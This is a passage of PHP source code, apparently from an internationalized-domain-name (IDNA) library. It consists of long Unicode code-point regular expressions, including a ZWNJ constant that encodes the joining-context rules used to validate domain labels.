x{1083C}\\x{1083D}-\\x{1083E}\\x{1083F}-\\x{10855}\\x{10856}\\x{10857}\\x{10858}-\\x{1085F}\\x{10860}-\\x{10876}\\x{10877}-\\x{10878}\\x{10879}-\\x{1087F}\\x{10880}-\\x{1089E}\\x{1089F}-\\x{108A6}\\x{108A7}-\\x{108AF}\\x{108B0}-\\x{108DF}\\x{108E0}-\\x{108F2}\\x{108F3}\\x{108F4}-\\x{108F5}\\x{108F6}-\\x{108FA}\\x{108FB}-\\x{108FF}\\x{10900}-\\x{10915}\\x{10916}-\\x{1091B}\\x{1091C}-\\x{1091E}\\x{1091F}\\x{10920}-\\x{10939}\\x{1093A}-\\x{1093E}\\x{1093F}\\x{10940}-\\x{1097F}\\x{10980}-\\x{109B7}\\x{109B8}-\\x{109BB}\\x{109BC}-\\x{109BD}\\x{109BE}-\\x{109BF}\\x{109C0}-\\x{109CF}\\x{109D0}-\\x{109D1}\\x{109D2}-\\x{109FF}\\x{10A00}\\x{10A01}-\\x{10A03}\\x{10A04}\\x{10A05}-\\x{10A06}\\x{10A07}-\\x{10A0B}\\x{10A0C}-\\x{10A0F}\\x{10A10}-\\x{10A13}\\x{10A14}\\x{10A15}-\\x{10A17}\\x{10A18}\\x{10A19}-\\x{10A35}\\x{10A36}-\\x{10A37}\\x{10A38}-\\x{10A3A}\\x{10A3B}-\\x{10A3E}\\x{10A3F}\\x{10A40}-\\x{10A48}\\x{10A49}-\\x{10A4F}\\x{10A50}-\\x{10A58}\\x{10A59}-\\x{10A5F}\\x{10A60}-\\x{10A7C}\\x{10A7D}-\\x{10A7E}\\x{10A7F}\\x{10A80}-\\x{10A9C}\\x{10A9D}-\\x{10A9F}\\x{10AA0}-\\x{10ABF}\\x{10AC0}-\\x{10AC7}\\x{10AC8}\\x{10AC9}-\\x{10AE4}\\x{10AE5}-\\x{10AE6}\\x{10AE7}-\\x{10AEA}\\x{10AEB}-\\x{10AEF}\\x{10AF0}-\\x{10AF6}\\x{10AF7}-\\x{10AFF}\\x{10B00}-\\x{10B35}\\x{10B36}-\\x{10B38}\\x{10B39}-\\x{10B3F}\\x{10B40}-\\x{10B55}\\x{10B56}-\\x{10B57}\\x{10B58}-\\x{10B5F}\\x{10B60}-\\x{10B72}\\x{10B73}-\\x{10B77}\\x{10B78}-\\x{10B7F}\\x{10B80}-\\x{10B91}\\x{10B92}-\\x{10B98}\\x{10B99}-\\x{10B9C}\\x{10B9D}-\\x{10BA8}\\x{10BA9}-\\x{10BAF}\\x{10BB0}-\\x{10BFF}\\x{10C00}-\\x{10C48}\\x{10C49}-\\x{10C7F}\\x{10C80}-\\x{10CB2}\\x{10CB3}-\\x{10CBF}\\x{10CC0}-\\x{10CF2}\\x{10CF3}-\\x{10CF9}\\x{10CFA}-\\x{10CFF}\\x{10D00}-\\x{10D23}\\x{10D24}-\\x{10D27}\\x{10D28}-\\x{10D2F}\\x{10D30}-\\x{10D39}\\x{10D3A}-\\x{10D3F}\\x{10D40}-\\x{10E5F}\\x{10E60}-\\x{10E7E}\\x{10E7F}\\x{10E80}-\\x{10EA9}\\x{10EAA}\\x{10EAB}-\\x{10EAC}\\x{10EAD}\\x{10EAE}-\\x{10EAF}\\x{10EB0}-\\x{10EB1}\\x{10EB2}-\\x{10EFF}\\x{10F00}-\\x{10F1C}\\x{10F1D}-\\x{10F26}\\x{10F27}\\x{10F28}-\\x{10F2F}\\x{10F30}-\\x{10F45}\\x{10F46}-\\x{10F50}\\x{10F51}-\\x{10F54}\\x{10F55}-\\x{10F59}\\x{10F5A}-\\x{10F6F}\\x{10F70}-\\x{10FAF}\\x{10FB0}-\\x{10FC4}\\x{10FC5}-\\x{10FCB}\\x{10FCC}-\\x{10FDF}\\x{10FE0}-\\x{10FF6}\\x{10FF7}-\\x{10FFF}\\x{11001}\\x{11038}-\\x{11046}\\x{11052}-\\x{11065}\\x{1107F}-\\x{11081}\\x{110B3}-\\x{110B6}\\x{110B9}-\\x{110BA}\\x{11100}-\\x{11102}\\x{11127}-\\x{1112B}\\x{1112D}-\\x{11134}\\x{11173}\\x{11180}-\\x{11181}\\x{111B6}-\\x{111BE}\\x{111C9}-\\x{111CC}\\x{111CF}\\x{1122F}-\\x{11231}\\x{11234}\\x{11236}-\\x{11237}\\x{1123E}\\x{112DF}\\x{112E3}-\\x{112EA}\\x{11300}-\\x{11301}\\x{1133B}-\\x{1133C}\\x{11340}\\x{11366}-\\x{1136C}\\x{11370}-\\x{11374}\\x{11438}-\\x{1143F}\\x{11442}-\\x{11444}\\x{11446}\\x{1145E}\\x{114B3}-\\x{114B8}\\x{114BA}\\x{114BF}-\\x{114C0}\\x{114C2}-\\x{114C3}\\x{115B2}-\\x{115B5}\\x{115BC}-\\x{115BD}\\x{115BF}-\\x{115C0}\\x{115DC}-\\x{115DD}\\x{11633}-\\x{1163A}\\x{1163D}\\x{1163F}-\\x{11640}\\x{11660}-\\x{1166C}\\x{116AB}\\x{116AD}\\x{116B0}-\\x{116B5}\\x{116B7}\\x{1171D}-\\x{1171F}\\x{11722}-\\x{11725}\\x{11727}-\\x{1172B}\\x{1182F}-\\x{11837}\\x{11839}-\\x{1183A}\\x{1193B}-\\x{1193C}\\x{1193E}\\x{11943}\\x{119D4}-\\x{119D7}\\x{119DA}-\\x{119DB}\\x{119E0}\\x{11A01}-\\x{11A06}\\x{11A09}-\\x{11A0A}\\x{11A33}-\\x{11A38}\\x{11A3B}-\\x{11A3E}\\x{11A47}\\x{11A51}-\\x{11A56}\\x{11A59}-\\x{11A5B}\\x{11A8A}-\\x{11A96}\\x{11A98}-\\x{11A99}\\x{11C30}-\\x{11C36}\\x{11C38}-\\x{11C3D}\\x{11C92}-\\x{11CA7}\\x{11CAA}-\\x{11CB0}\\x{11CB2}-\\x{11CB3}\\x{11CB5}-\\x{11CB6}\\x{11D31}-\\x{11D36}\\x{11D3A}\\x{11D3C}-\\x{11D3D}\\x{11D3F}-\\x{11D45}\\x{11D47}\\x{11D90}-\\x{11D91}\\x{11D95}\\x{11D97}\\x{11EF3}-\\x{11EF4}\\x{11FD5}-\\x{11FDC}\\x{11FDD}-\\x{11FE0}\\x{11FE1}-\\x{11FF1}\\x{16AF0}-\\x{16AF4}\\x{16B30}-\\x{16B36}\\x{16F4F}\\x{16F8F}-\\x{16F92}\\x{16FE2}\\x{16FE4}\\x{1BC9D}-\\x{1BC9E}\\x{1BCA0}-\\x{1BCA3}\\x{1D167}-\\x{1D169}\\x{1D173}-\\x{1D17A}\\x{1D17B}-\\x{1D182}\\x{1D185}-\\x{1D18B}\\x{1D1AA}-\\x{1D1AD}\\x{1D200}-\\x{1D241}\\x{1D242}-\\x{1D244}\\x{1D245}\\x{1D300}-\\x{1D356}\\x{1D6DB}\\x{1D715}\\x{1D74F}\\x{1D789}\\x{1D7C3}\\x{1DA00}-\\x{1DA36}\\x{1DA3B}-\\x{1DA6C}\\x{1DA75}\\x{1DA84}\\x{1DA9B}-\\x{1DA9F}\\x{1DAA1}-\\x{1DAAF}\\x{1E000}-\\x{1E006}\\x{1E008}-\\x{1E018}\\x{1E01B}-\\x{1E021}\\x{1E023}-\\x{1E024}\\x{1E026}-\\x{1E02A}\\x{1E130}-\\x{1E136}\\x{1E2EC}-\\x{1E2EF}\\x{1E2FF}\\x{1E800}-\\x{1E8C4}\\x{1E8C5}-\\x{1E8C6}\\x{1E8C7}-\\x{1E8CF}\\x{1E8D0}-\\x{1E8D6}\\x{1E8D7}-\\x{1E8FF}\\x{1E900}-\\x{1E943}\\x{1E944}-\\x{1E94A}\\x{1E94B}\\x{1E94C}-\\x{1E94F}\\x{1E950}-\\x{1E959}\\x{1E95A}-\\x{1E95D}\\x{1E95E}-\\x{1E95F}\\x{1E960}-\\x{1EC6F}\\x{1EC70}\\x{1EC71}-\\x{1ECAB}\\x{1ECAC}\\x{1ECAD}-\\x{1ECAF}\\x{1ECB0}\\x{1ECB1}-\\x{1ECB4}\\x{1ECB5}-\\x{1ECBF}\\x{1ECC0}-\\x{1ECFF}\\x{1ED00}\\x{1ED01}-\\x{1ED2D}\\x{1ED2E}\\x{1ED2F}-\\x{1ED3D}\\x{1ED3E}-\\x{1ED4F}\\x{1ED50}-\\x{1EDFF}\\x{1EE00}-\\x{1EE03}\\x{1EE04}\\x{1EE05}-\\x{1EE1F}\\x{1EE20}\\x{1EE21}-\\x{1EE22}\\x{1EE23}\\x{1EE24}\\x{1EE25}-\\x{1EE26}\\x{1EE27}\\x{1EE28}\\x{1EE29}-\\x{1EE32}\\x{1EE33}\\x{1EE34}-\\x{1EE37}\\x{1EE38}\\x{1EE39}\\x{1EE3A}\\x{1EE3B}\\x{1EE3C}-\\x{1EE41}\\x{1EE42}\\x{1EE43}-\\x{1EE46}\\x{1EE47}\\x{1EE48}\\x{1EE49}\\x{1EE4A}\\x{1EE4B}\\x{1EE4C}\\x{1EE4D}-\\x{1EE4F}\\x{1EE50}\\x{1EE51}-\\x{1EE52}\\x{1EE53}\\x{1EE54}\\x{1EE55}-\\x{1EE56}\\x{1EE57}\\x{1EE58}\\x{1EE59}\\x{1EE5A}\\x{1EE5B}\\x{1EE5C}\\x{1EE5D}\\x{1EE5E}\\x{1EE5F}\\x{1EE60}\\x{1EE61}-\\x{1EE62}\\x{1EE63}\\x{1EE64}\\x{1EE65}-\\x{1EE66}\\x{1EE67}-\\x{1EE6A}\\x{1EE6B}\\x{1EE6C}-\\x{1EE72}\\x{1EE73}\\x{1EE74}-\\x{1EE77}\\x{1EE78}\\x{1EE79}-\\x{1EE7C}\\x{1EE7D}\\x{1EE7E}\\x{1EE7F}\\x{1EE80}-\\x{1EE89}\\x{1EE8A}\\x{1EE8B}-\\x{1EE9B}\\x{1EE9C}-\\x{1EEA0}\\x{1EEA1}-\\x{1EEA3}\\x{1EEA4}\\x{1EEA5}-\\x{1EEA9}\\x{1EEAA}\\x{1EEAB}-\\x{1EEBB}\\x{1EEBC}-\\x{1EEEF}\\x{1EEF0}-\\x{1EEF1}\\x{1EEF2}-\\x{1EEFF}\\x{1EF00}-\\x{1EFFF}\\x{1F000}-\\x{1F02B}\\x{1F030}-\\x{1F093}\\x{1F0A0}-\\x{1F0AE}\\x{1F0B1}-\\x{1F0BF}\\x{1F0C1}-\\x{1F0CF}\\x{1F0D1}-\\x{1F0F5}\\x{1F10B}-\\x{1F10C}\\x{1F10D}-\\x{1F10F}\\x{1F12F}\\x{1F16A}-\\x{1F16F}\\x{1F1AD}\\x{1F260}-\\x{1F265}\\x{1F300}-\\x{1F3FA}\\x{1F3FB}-\\x{1F3FF}\\x{1F400}-\\x{1F6D7}\\x{1F6E0}-\\x{1F6EC}\\x{1F6F0}-\\x{1F6FC}\\x{1F700}-\\x{1F773}\\x{1F780}-\\x{1F7D8}\\x{1F7E0}-\\x{1F7EB}\\x{1F800}-\\x{1F80B}\\x{1F810}-\\x{1F847}\\x{1F850}-\\x{1F859}\\x{1F860}-\\x{1F887}\\x{1F890}-\\x{1F8AD}\\x{1F8B0}-\\x{1F8B1}\\x{1F900}-\\x{1F978}\\x{1F97A}-\\x{1F9CB}\\x{1F9CD}-\\x{1FA53}\\x{1FA60}-\\x{1FA6D}\\x{1FA70}-\\x{1FA74}\\x{1FA78}-\\x{1FA7A}\\x{1FA80}-\\x{1FA86}\\x{1FA90}-\\x{1FAA8}\\x{1FAB0}-\\x{1FAB6}\\x{1FAC0}-\\x{1FAC2}\\x{1FAD0}-\\x{1FAD6}\\x{1FB00}-\\x{1FB92}\\x{1FB94}-\\x{1FBCA}\\x{1FFFE}-\\x{1FFFF}\\x{2FFFE}-\\x{2FFFF}\\x{3FFFE}-\\x{3FFFF}\\x{4FFFE}-\\x{4FFFF}\\x{5FFFE}-\\x{5FFFF}\\x{6FFFE}-\\x{6FFFF}\\x{7FFFE}-\\x{7FFFF}\\x{8FFFE}-\\x{8FFFF}\\x{9FFFE}-\\x{9FFFF}\\x{AFFFE}-\\x{AFFFF}\\x{BFFFE}-\\x{BFFFF}\\x{CFFFE}-\\x{CFFFF}\\x{DFFFE}-\\x{E0000}\\x{E0001}\\x{E0002}-\\x{E001F}\\x{E0020}-\\x{E007F}\\x{E0080}-\\x{E00FF}\\x{E0100}-\\x{E01EF}\\x{E01F0}-\\x{E0FFF}\\x{EFFFE}-\\x{EFFFF}\\x{FFFFE}-\\x{FFFFF}\\x{10FFFE}-\\x{10FFFF}][\\x{0300}-\\x{036F}\\x{0483}-\\x{0487}\\x{0488}-\\x{0489}\\x{0591}-\\x{05BD}\\x{05BF}\\x{05C1}-\\x{05C2}\\x{05C4}-\\x{05C5}\\x{05C7}\\x{0610}-\\x{061A}\\x{064B}-\\x{065F}\\x{0670}\\x{06D6}-\\x{06DC}\\x{06DF}-\\x{06E4}\\x{06E7}-\\x{06E8}\\x{06EA}-\\x{06ED}\\x{0711}\\x{0730}-\\x{074A}\\x{07A6}-\\x{07B0}\\x{07EB}-\\x{07F3}\\x{07FD}\\x{0816}-\\x{0819}\\x{081B}-\\x{0823}\\x{0825}-\\x{0827}\\x{0829}-\\x{082D}\\x{0859}-\\x{085B}\\x{08D3}-\\x{08E1}\\x{08E3}-\\x{0902}\\x{093A}\\x{093C}\\x{0941}-\\x{0948}\\x{094D}\\x{0951}-\\x{0957}\\x{0962}-\\x{0963}\\x{0981}\\x{09BC}\\x{09C1}-\\x{09C4}\\x{09CD}\\x{09E2}-\\x{09E3}\\x{09FE}\\x{0A01}-\\x{0A02}\\x{0A3C}\\x{0A41}-\\x{0A42}\\x{0A47}-\\x{0A48}\\x{0A4B}-\\x{0A4D}\\x{0A51}\\x{0A70}-\\x{0A71}\\x{0A75}\\x{0A81}-\\x{0A82}\\x{0ABC}\\x{0AC1}-\\x{0AC5}\\x{0AC7}-\\x{0AC8}\\x{0ACD}\\x{0AE2}-\\x{0AE3}\\x{0AFA}-\\x{0AFF}\\x{0B01}\\x{0B3C}\\x{0B3F}\\x{0B41}-\\x{0B44}\\x{0B4D}\\x{0B55}-\\x{0B56}\\x{0B62}-\\x{0B63}\\x{0B82}\\x{0BC0}\\x{0BCD}\\x{0C00}\\x{0C04}\\x{0C3E}-\\x{0C40}\\x{0C46}-\\x{0C48}\\x{0C4A}-\\x{0C4D}\\x{0C55}-\\x{0C56}\\x{0C62}-\\x{0C63}\\x{0C81}\\x{0CBC}\\x{0CCC}-\\x{0CCD}\\x{0CE2}-\\x{0CE3}\\x{0D00}-\\x{0D01}\\x{0D3B}-\\x{0D3C}\\x{0D41}-\\x{0D44}\\x{0D4D}\\x{0D62}-\\x{0D63}\\x{0D81}\\x{0DCA}\\x{0DD2}-\\x{0DD4}\\x{0DD6}\\x{0E31}\\x{0E34}-\\x{0E3A}\\x{0E47}-\\x{0E4E}\\x{0EB1}\\x{0EB4}-\\x{0EBC}\\x{0EC8}-\\x{0ECD}\\x{0F18}-\\x{0F19}\\x{0F35}\\x{0F37}\\x{0F39}\\x{0F71}-\\x{0F7E}\\x{0F80}-\\x{0F84}\\x{0F86}-\\x{0F87}\\x{0F8D}-\\x{0F97}\\x{0F99}-\\x{0FBC}\\x{0FC6}\\x{102D}-\\x{1030}\\x{1032}-\\x{1037}\\x{1039}-\\x{103A}\\x{103D}-\\x{103E}\\x{1058}-\\x{1059}\\x{105E}-\\x{1060}\\x{1071}-\\x{1074}\\x{1082}\\x{1085}-\\x{1086}\\x{108D}\\x{109D}\\x{135D}-\\x{135F}\\x{1712}-\\x{1714}\\x{1732}-\\x{1734}\\x{1752}-\\x{1753}\\x{1772}-\\x{1773}\\x{17B4}-\\x{17B5}\\x{17B7}-\\x{17BD}\\x{17C6}\\x{17C9}-\\x{17D3}\\x{17DD}\\x{180B}-\\x{180D}\\x{1885}-\\x{1886}\\x{18A9}\\x{1920}-\\x{1922}\\x{1927}-\\x{1928}\\x{1932}\\x{1939}-\\x{193B}\\x{1A17}-\\x{1A18}\\x{1A1B}\\x{1A56}\\x{1A58}-\\x{1A5E}\\x{1A60}\\x{1A62}\\x{1A65}-\\x{1A6C}\\x{1A73}-\\x{1A7C}\\x{1A7F}\\x{1AB0}-\\x{1ABD}\\x{1ABE}\\x{1ABF}-\\x{1AC0}\\x{1B00}-\\x{1B03}\\x{1B34}\\x{1B36}-\\x{1B3A}\\x{1B3C}\\x{1B42}\\x{1B6B}-\\x{1B73}\\x{1B80}-\\x{1B81}\\x{1BA2}-\\x{1BA5}\\x{1BA8}-\\x{1BA9}\\x{1BAB}-\\x{1BAD}\\x{1BE6}\\x{1BE8}-\\x{1BE9}\\x{1BED}\\x{1BEF}-\\x{1BF1}\\x{1C2C}-\\x{1C33}\\x{1C36}-\\x{1C37}\\x{1CD0}-\\x{1CD2}\\x{1CD4}-\\x{1CE0}\\x{1CE2}-\\x{1CE8}\\x{1CED}\\x{1CF4}\\x{1CF8}-\\x{1CF9}\\x{1DC0}-\\x{1DF9}\\x{1DFB}-\\x{1DFF}\\x{20D0}-\\x{20DC}\\x{20DD}-\\x{20E0}\\x{20E1}\\x{20E2}-\\x{20E4}\\x{20E5}-\\x{20F0}\\x{2CEF}-\\x{2CF1}\\x{2D7F}\\x{2DE0}-\\x{2DFF}\\x{302A}-\\x{302D}\\x{3099}-\\x{309A}\\x{A66F}\\x{A670}-\\x{A672}\\x{A674}-\\x{A67D}\\x{A69E}-\\x{A69F}\\x{A6F0}-\\x{A6F1}\\x{A802}\\x{A806}\\x{A80B}\\x{A825}-\\x{A826}\\x{A82C}\\x{A8C4}-\\x{A8C5}\\x{A8E0}-\\x{A8F1}\\x{A8FF}\\x{A926}-\\x{A92D}\\x{A947}-\\x{A951}\\x{A980}-\\x{A982}\\x{A9B3}\\x{A9B6}-\\x{A9B9}\\x{A9BC}-\\x{A9BD}\\x{A9E5}\\x{AA29}-\\x{AA2E}\\x{AA31}-\\x{AA32}\\x{AA35}-\\x{AA36}\\x{AA43}\\x{AA4C}\\x{AA7C}\\x{AAB0}\\x{AAB2}-\\x{AAB4}\\x{AAB7}-\\x{AAB8}\\x{AABE}-\\x{AABF}\\x{AAC1}\\x{AAEC}-\\x{AAED}\\x{AAF6}\\x{ABE5}\\x{ABE8}\\x{ABED}\\x{FB1E}\\x{FE00}-\\x{FE0F}\\x{FE20}-\\x{FE2F}\\x{101FD}\\x{102E0}\\x{10376}-\\x{1037A}\\x{10A01}-\\x{10A03}\\x{10A05}-\\x{10A06}\\x{10A0C}-\\x{10A0F}\\x{10A38}-\\x{10A3A}\\x{10A3F}\\x{10AE5}-\\x{10AE6}\\x{10D24}-\\x{10D27}\\x{10EAB}-\\x{10EAC}\\x{10F46}-\\x{10F50}\\x{11001}\\x{11038}-\\x{11046}\\x{1107F}-\\x{11081}\\x{110B3}-\\x{110B6}\\x{110B9}-\\x{110BA}\\x{11100}-\\x{11102}\\x{11127}-\\x{1112B}\\x{1112D}-\\x{11134}\\x{11173}\\x{11180}-\\x{11181}\\x{111B6}-\\x{111BE}\\x{111C9}-\\x{111CC}\\x{111CF}\\x{1122F}-\\x{11231}\\x{11234}\\x{11236}-\\x{11237}\\x{1123E}\\x{112DF}\\x{112E3}-\\x{112EA}\\x{11300}-\\x{11301}\\x{1133B}-\\x{1133C}\\x{11340}\\x{11366}-\\x{1136C}\\x{11370}-\\x{11374}\\x{11438}-\\x{1143F}\\x{11442}-\\x{11444}\\x{11446}\\x{1145E}\\x{114B3}-\\x{114B8}\\x{114BA}\\x{114BF}-\\x{114C0}\\x{114C2}-\\x{114C3}\\x{115B2}-\\x{115B5}\\x{115BC}-\\x{115BD}\\x{115BF}-\\x{115C0}\\x{115DC}-\\x{115DD}\\x{11633}-\\x{1163A}\\x{1163D}\\x{1163F}-\\x{11640}\\x{116AB}\\x{116AD}\\x{116B0}-\\x{116B5}\\x{116B7}\\x{1171D}-\\x{1171F}\\x{11722}-\\x{11725}\\x{11727}-\\x{1172B}\\x{1182F}-\\x{11837}\\x{11839}-\\x{1183A}\\x{1193B}-\\x{1193C}\\x{1193E}\\x{11943}\\x{119D4}-\\x{119D7}\\x{119DA}-\\x{119DB}\\x{119E0}\\x{11A01}-\\x{11A06}\\x{11A09}-\\x{11A0A}\\x{11A33}-\\x{11A38}\\x{11A3B}-\\x{11A3E}\\x{11A47}\\x{11A51}-\\x{11A56}\\x{11A59}-\\x{11A5B}\\x{11A8A}-\\x{11A96}\\x{11A98}-\\x{11A99}\\x{11C30}-\\x{11C36}\\x{11C38}-\\x{11C3D}\\x{11C92}-\\x{11CA7}\\x{11CAA}-\\x{11CB0}\\x{11CB2}-\\x{11CB3}\\x{11CB5}-\\x{11CB6}\\x{11D31}-\\x{11D36}\\x{11D3A}\\x{11D3C}-\\x{11D3D}\\x{11D3F}-\\x{11D45}\\x{11D47}\\x{11D90}-\\x{11D91}\\x{11D95}\\x{11D97}\\x{11EF3}-\\x{11EF4}\\x{16AF0}-\\x{16AF4}\\x{16B30}-\\x{16B36}\\x{16F4F}\\x{16F8F}-\\x{16F92}\\x{16FE4}\\x{1BC9D}-\\x{1BC9E}\\x{1D167}-\\x{1D169}\\x{1D17B}-\\x{1D182}\\x{1D185}-\\x{1D18B}\\x{1D1AA}-\\x{1D1AD}\\x{1D242}-\\x{1D244}\\x{1DA00}-\\x{1DA36}\\x{1DA3B}-\\x{1DA6C}\\x{1DA75}\\x{1DA84}\\x{1DA9B}-\\x{1DA9F}\\x{1DAA1}-\\x{1DAAF}\\x{1E000}-\\x{1E006}\\x{1E008}-\\x{1E018}\\x{1E01B}-\\x{1E021}\\x{1E023}-\\x{1E024}\\x{1E026}-\\x{1E02A}\\x{1E130}-\\x{1E136}\\x{1E2EC}-\\x{1E2EF}\\x{1E8D0}-\\x{1E8D6}\\x{1E944}-\\x{1E94A}\\x{E0100}-\\x{E01EF}]*$/u'; const ZWNJ = '/([\\x{A872}\\x{10ACD}\\x{10AD7}\\x{10D00}\\x{10FCB}\\x{0620}\\x{0626}\\x{0628}\\x{062A}-\\x{062E}\\x{0633}-\\x{063F}\\x{0641}-\\x{0647}\\x{0649}-\\x{064A}\\x{066E}-\\x{066F}\\x{0678}-\\x{0687}\\x{069A}-\\x{06BF}\\x{06C1}-\\x{06C2}\\x{06CC}\\x{06CE}\\x{06D0}-\\x{06D1}\\x{06FA}-\\x{06FC}\\x{06FF}\\x{0712}-\\x{0714}\\x{071A}-\\x{071D}\\x{071F}-\\x{0727}\\x{0729}\\x{072B}\\x{072D}-\\x{072E}\\x{074E}-\\x{0758}\\x{075C}-\\x{076A}\\x{076D}-\\x{0770}\\x{0772}\\x{0775}-\\x{0777}\\x{077A}-\\x{077F}\\x{07CA}-\\x{07EA}\\x{0841}-\\x{0845}\\x{0848}\\x{084A}-\\x{0853}\\x{0855}\\x{0860}\\x{0862}-\\x{0865}\\x{0868}\\x{08A0}-\\x{08A9}\\x{08AF}-\\x{08B0}\\x{08B3}-\\x{08B4}\\x{08B6}-\\x{08B8}\\x{08BA}-\\x{08C7}\\x{1807}\\x{1820}-\\x{1842}\\x{1843}\\x{1844}-\\x{1878}\\x{1887}-\\x{18A8}\\x{18AA}\\x{A840}-\\x{A871}\\x{10AC0}-\\x{10AC4}\\x{10AD3}-\\x{10AD6}\\x{10AD8}-\\x{10ADC}\\x{10ADE}-\\x{10AE0}\\x{10AEB}-\\x{10AEE}\\x{10B80}\\x{10B82}\\x{10B86}-\\x{10B88}\\x{10B8A}-\\x{10B8B}\\x{10B8D}\\x{10B90}\\x{10BAD}-\\x{10BAE}\\x{10D01}-\\x{10D21}\\x{10D23}\\x{10F30}-\\x{10F32}\\x{10F34}-\\x{10F44}\\x{10F51}-\\x{10F53}\\x{10FB0}\\x{10FB2}-\\x{10FB3}\\x{10FB8}\\x{10FBB}-\\x{10FBC}\\x{10FBE}-\\x{10FBF}\\x{10FC1}\\x{10FC4}\\x{10FCA}\\x{1E900}-\\x{1E943}][\\x{00AD}\\x{0300}-\\x{036F}\\x{0483}-\\x{0487}\\x{0488}-\\x{0489}\\x{0591}-\\x{05BD}\\x{05BF}\\x{05C1}-\\x{05C2}\\x{05C4}-\\x{05C5}\\x{05C7}\\x{0610}-\\x{061A}\\x{061C}\\x{064B}-\\x{065F}\\x{0670}\\x{06D6}-\\x{06DC}\\x{06DF}-\\x{06E4}\\x{06E7}-\\x{06E8}\\x{06EA}-\\x{06ED}\\x{070F}\\x{0711}\\x{0730}-\\x{074A}\\x{07A6}-\\x{07B0}\\x{07EB}-\\x{07F3}\\x{07FD}\\x{0816}-\\x{0819}\\x{081B}-\\x{0823}\\x{0825}-\\x{0827}\\x{0829}-\\x{082D}\\x{0859}-\\x{085B}\\x{08D3}-\\x{08E1}\\x{08E3}-\\x{0902}\\x{093A}\\x{093C}\\x{0941}-\\x{0948}\\x{094D}\\x{0951}-\\x{0957}\\x{0962}-\\x{0963}\\x{0981}\\x{09BC}\\x{09C1}-\\x{09C4}\\x{09CD}\\x{09E2}-\\x{09E3}\\x{09FE}\\x{0A01}-\\x{0A02}\\x{0A3C}\\x{0A41}-\\x{0A42}\\x{0A47}-\\x{0A48}\\x{0A4B}-\\x{0A4D}\\x{0A51}\\x{0A70}-\\x{0A71}\\x{0A75}\\x{0A81}-\\x{0A82}\\x{0ABC}\\x{0AC1}-\\x{0AC5}\\x{0AC7}-\\x{0AC8}\\x{0ACD}\\x{0AE2}-\\x{0AE3}\\x{0AFA}-\\x{0AFF}\\x{0B01}\\x{0B3C}\\x{0B3F}\\x{0B41}-\\x{0B44}\\x{0B4D}\\x{0B55}-\\x{0B56}\\x{0B62}-\\x{0B63}\\x{0B82}\\x{0BC0}\\x{0BCD}\\x{0C00}\\x{0C04}\\x{0C3E}-\\x{0C40}\\x{0C46}-\\x{0C48}\\x{0C4A}-\\x{0C4D}\\x{0C55}-\\x{0C56}\\x{0C62}-\\x{0C63}\\x{0C81}\\x{0CBC}\\x{0CBF}\\x{0CC6}\\x{0CCC}-\\x{0CCD}\\x{0CE2}-\\x{0CE3}\\x{0D00}-\\x{0D01}\\x{0D3B}-\\x{0D3C}\\x{0D41}-\\x{0D44}\\x{0D4D}\\x{0D62}-\\x{0D63}\\x{0D81}\\x{0DCA}\\x{0DD2}-\\x{0DD4}\\x{0DD6}\\x{0E31}\\x{0E34}-\\x{0E3A}\\x{0E47}-\\x{0E4E}\\x{0EB1}\\x{0EB4}-\\x{0EBC}\\x{0EC8}-\\x{0ECD}\\x{0F18}-\\x{0F19}\\x{0F35}\\x{0F37}\\x{0F39}\\x{0F71}-\\x{0F7E}\\x{0F80}-\\x{0F84}\\x{0F86}-\\x{0F87}\\x{0F8D}-\\x{0F97}\\x{0F99}-\\x{0FBC}\\x{0FC6}\\x{102D}-\\x{1030}\\x{1032}-\\x{1037}\\x{1039}-\\x{103A}\\x{103D}-\\x{103E}\\x{1058}-\\x{1059}\\x{105E}-\\x{1060}\\x{1071}-\\x{1074}\\x{1082}\\x{1085}-\\x{1086}\\x{108D}\\x{109D}\\x{135D}-\\x{135F}\\x{1712}-\\x{1714}\\x{1732}-\\x{1734}\\x{1752}-\\x{1753}\\x{1772}-\\x{1773}\\x{17B4}-\\x{17B5}\\x{17B7}-\\x{17BD}\\x{17C6}\\x{17C9}-\\x{17D3}\\x{17DD}\\x{180B}-\\x{180D}\\x{1885}-\\x{1886}\\x{18A9}\\x{1920}-\\x{1922}\\x{1927}-\\x{1928}\\x{1932}\\x{1939}-\\x{193B}\\x{1A17}-\\x{1A18}\\x{1A1B}\\x{1A56}\\x{1A58}-\\x{1A5E}\\x{1A60}\\x{1A62}\\x{1A65}-\\x{1A6C}\\x{1A73}-\\x{1A7C}\\x{1A7F}\\x{1AB0}-\\x{1ABD}\\x{1ABE}\\x{1ABF}-\\x{1AC0}\\x{1B00}-\\x{1B03}\\x{1B34}\\x{1B36}-\\x{1B3A}\\x{1B3C}\\x{1B42}\\x{1B6B}-\\x{1B73}\\x{1B80}-\\x{1B81}\\x{1BA2}-\\x{1BA5}\\x{1BA8}-\\x{1BA9}\\x{1BAB}-\\x{1BAD}\\x{1BE6}\\x{1BE8}-\\x{1BE9}\\x{1BED}\\x{1BEF}-\\x{1BF1}\\x{1C2C}-\\x{1C33}\\x{1C36}-\\x{1C37}\\x{1CD0}-\\x{1CD2}\\x{1CD4}-\\x{1CE0}\\x{1CE2}-\\x{1CE8}\\x{1CED}\\x{1CF4}\\x{1CF8}-\\x{1CF9}\\x{1DC0}-\\x{1DF9}\\x{1DFB}-\\x{1DFF}\\x{200B}\\x{200E}-\\x{200F}\\x{202A}-\\x{202E}\\x{2060}-\\x{2064}\\x{206A}-\\x{206F}\\x{20D0}-\\x{20DC}\\x{20DD}-\\x{20E0}\\x{20E1}\\x{20E2}-\\x{20E4}\\x{20E5}-\\x{20F0}\\x{2CEF}-\\x{2CF1}\\x{2D7F}\\x{2DE0}-\\x{2DFF}\\x{302A}-\\x{302D}\\x{3099}-\\x{309A}\\x{A66F}\\x{A670}-\\x{A672}\\x{A674}-\\x{A67D}\\x{A69E}-\\x{A69F}\\x{A6F0}-\\x{A6F1}\\x{A802}\\x{A806}\\x{A80B}\\x{A825}-\\x{A826}\\x{A82C}\\x{A8C4}-\\x{A8C5}\\x{A8E0}-\\x{A8F1}\\x{A8FF}\\x{A926}-\\x{A92D}\\x{A947}-\\x{A951}\\x{A980}-\\x{A982}\\x{A9B3}\\x{A9B6}-\\x{A9B9}\\x{A9BC}-\\x{A9BD}\\x{A9E5}\\x{AA29}-\\x{AA2E}\\x{AA31}-\\x{AA32}\\x{AA35}-\\x{AA36}\\x{AA43}\\x{AA4C}\\x{AA7C}\\x{AAB0}\\x{AAB2}-\\x{AAB4}\\x{AAB7}-\\x{AAB8}\\x{AABE}-\\x{AABF}\\x{AAC1}\\x{AAEC}-\\x{AAED}\\x{AAF6}\\x{ABE